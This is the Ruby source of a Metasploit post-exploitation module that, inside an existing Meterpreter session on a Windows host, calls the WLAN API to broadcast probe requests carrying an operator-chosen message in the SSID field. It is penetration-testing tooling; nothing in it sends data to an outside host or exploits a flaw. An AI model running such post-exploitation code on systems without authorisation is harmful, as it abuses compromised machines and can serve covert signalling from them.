##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
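class MetasploitModule < Msf::Post
  # DOT11_SSID_MAX_LENGTH from wlanapi.h. DOT11_SSID is a fixed-size struct:
  #
  #   typedef struct _DOT11_SSID {
  #     ULONG uSSIDLength;
  #     UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];
  #   } DOT11_SSID, *PDOT11_SSID;
  #
  # so the buffer handed to WlanScan is always 4 + 32 bytes.
  DOT11_SSID_MAX_LENGTH = 32

  # Seconds to wait between successive WlanScan calls.
  SCAN_INTERVAL = 10

  # Human-readable names for the WLAN_INTERFACE_STATE value read out of each
  # WLAN_INTERFACE_INFO entry by enum_interfaces.
  WLAN_INTERFACE_STATES = {
    0 => 'The interface is not ready to operate.',
    1 => 'The interface is connected to a network.',
    2 => 'The interface is the first node in an ad hoc network. No peer has connected.',
    3 => 'The interface is disconnecting from the current network.',
    4 => 'The interface is not connected to any network.',
    5 => 'The interface is attempting to associate with a network.',
    6 => 'Auto configuration is discovering the settings for the network.',
    7 => 'The interface is in the process of authenticating.'
  }.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Send Probe Request Packets',
        'Description' => %q{
          This module send probe requests through the wlan interface.
          The ESSID field will be use to set a custom message.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>' ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_railgun_api
              stdapi_sys_process_attach
              stdapi_sys_process_getpid
            ]
          }
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),
        OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', 30])
      ]
    )
  end

  # Entry point: validate options, open a WlanAPI client handle, then issue
  # WlanScan calls carrying the SSID on every wireless interface until TIMEOUT
  # elapses. The WlanAPI handle is closed on every exit path (it previously
  # leaked when no interface was found or when a railgun call raised).
  def run
    ssid = datastore['SSID'].to_s
    time = datastore['TIMEOUT'].to_i

    # Compare bytes, not characters: a short multibyte (UTF-8) message can
    # still overflow the 32-byte ucSSID array, and uSSIDLength is a byte count.
    if ssid.bytesize > DOT11_SSID_MAX_LENGTH
      fail_with(Failure::BadConfig, "The SSID must be equal to or less than #{DOT11_SSID_MAX_LENGTH} bytes")
    end

    # Without a positive timeout the probe loop would never end and the
    # session would be tied up indefinitely.
    fail_with(Failure::BadConfig, 'TIMEOUT must be a positive number of seconds') if time <= 0

    mypid = client.sys.process.getpid
    # This handle is only used to read WLAN structures out of our own process.
    # NOTE(review): PROCESS_ALL_ACCESS is broader than those reads need; a
    # narrower access mask would likely suffice but has not been verified here.
    @host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
    @wlanapi = client.railgun.wlanapi

    wlan_handle = open_handle
    unless wlan_handle
      print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
      print_error('On Windows XP this could also mean the Wireless Zero Configuration Service is turned off')
      return
    end

    wlan_iflist = enum_interfaces(wlan_handle)
    if wlan_iflist.empty?
      print_status('Wlan interfaces not found')
      return
    end

    print_status("Wlan interfaces found: #{wlan_iflist.length}")
    print_status("Sending probe requests for #{time} seconds")
    send_probes(wlan_handle, wlan_iflist, build_dot11_ssid(ssid), time)
  ensure
    # Runs on normal return, on fail_with and on any exception raised above;
    # wlan_handle is nil when open_handle never ran or failed.
    close_handle(wlan_handle) if wlan_handle
  end

  # Call WlanScan with +dot_11_ssid+ on every interface in turn, sleeping
  # SCAN_INTERVAL between calls, until +seconds+ have elapsed.
  #
  # A wall-clock deadline is used instead of Timeout.timeout: Timeout raises
  # asynchronously into this thread and can interrupt a railgun round-trip
  # mid-flight, which may leave the Meterpreter channel in an undefined state.
  def send_probes(wlan_handle, wlan_iflist, dot_11_ssid, seconds)
    deadline = Process.clock_gettime(Process::CLOCK_MONOTONIC) + seconds
    payload_hex = dot_11_ssid.bytes.map { |b| format('%02x', b) }.join(':')

    loop do
      wlan_iflist.each do |interface|
        remaining = deadline - Process.clock_gettime(Process::CLOCK_MONOTONIC)
        return if remaining <= 0

        vprint_status("Interface Guid: #{interface['guid'].unpack('H*')[0]}")
        vprint_status("Interface State: #{interface['state']}")
        vprint_status("DOT11_SSID payload: #{payload_hex}")
        scan = @wlanapi.WlanScan(wlan_handle, interface['guid'], dot_11_ssid, nil, nil)
        # railgun reports the Win32 status in 'return'; 0 (ERROR_SUCCESS)
        # means the scan request was accepted by the WLAN service.
        vprint_error("WlanScan returned error #{scan['return']}") unless scan['return'] == 0

        # Never sleep past the deadline.
        sleep([SCAN_INTERVAL, remaining].min)
      end
    end
  end

  # Serialise +ssid+ as a DOT11_SSID: little-endian ULONG byte length followed
  # by the fixed 32-byte ucSSID array, zero-padded so WlanScan always sees a
  # complete struct instead of reading past the end of the railgun buffer.
  def build_dot11_ssid(ssid)
    bytes = ssid.b
    [bytes.bytesize].pack('L<') + bytes.ljust(DOT11_SSID_MAX_LENGTH, "\x00".b)
  end

  # Function borrowed from @theLightCosine wlan_* modules.
  # Open a WlanAPI client handle. Returns the handle, or nil if the call
  # raised (e.g. wlanapi.dll not present) or returned a Win32 error: railgun
  # does not raise on a non-zero return, and 0 is truthy in Ruby, so the
  # status code has to be checked explicitly or a zeroed handle gets used.
  def open_handle
    wlhandle = @wlanapi.WlanOpenHandle(2, nil, 4, 4)
    return nil unless wlhandle['return'] == 0

    wlhandle['phClientHandle']
  rescue StandardError
    nil
  end

  # Release the WlanAPI client handle. Best-effort: a failure is reported but
  # never raised, because this is called from run's ensure clause.
  def close_handle(wlan_handle)
    closehandle = @wlanapi.WlanCloseHandle(wlan_handle, nil)
    if closehandle['return'] == 0
      print_status('WlanAPI Handle closed successfully')
    else
      print_error('There was an error closing the Handle')
    end
  rescue StandardError => e
    print_error("There was an error closing the Handle: #{e.message}")
  end

  # Function borrowed from @theLightCosine wlan_* modules.
  # Read the WLAN_INTERFACE_INFO_LIST returned by WlanEnumInterfaces out of
  # our own process memory:
  #
  #   DWORD dwNumberOfItems; DWORD dwIndex; WLAN_INTERFACE_INFO InterfaceInfo[];
  #
  # where each WLAN_INTERFACE_INFO is a 16-byte GUID, a 512-byte WCHAR[256]
  # description and a 4-byte WLAN_INTERFACE_STATE (532 bytes per entry).
  # Returns an array of {'guid', 'description', 'state'} hashes; 'guid' and
  # 'description' are the raw bytes, 'state' is a human-readable string.
  # Returns [] when the call fails instead of dereferencing an invalid pointer.
  # NOTE(review): the list is never released with WlanFreeMemory as the WLAN
  # API documentation requires; this leaks one list per run.
  def enum_interfaces(wlan_handle)
    iflist = @wlanapi.WlanEnumInterfaces(wlan_handle, nil, 4)
    return [] unless iflist['return'] == 0

    pointer = iflist['ppInterfaceList']
    numifs = @host_process.memory.read(pointer, 4).unpack('V')[0]

    # Skip dwNumberOfItems and dwIndex to reach the first array element.
    pointer += 8
    Array.new(numifs) do
      guid = @host_process.memory.read(pointer, 16)
      pointer += 16
      description = @host_process.memory.read(pointer, 512)
      pointer += 512
      state = @host_process.memory.read(pointer, 4).unpack('V')[0]
      pointer += 4
      {
        'guid' => guid,
        'description' => description,
        'state' => WLAN_INTERFACE_STATES.fetch(state, 'Unknown State')
      }
    end
  end
end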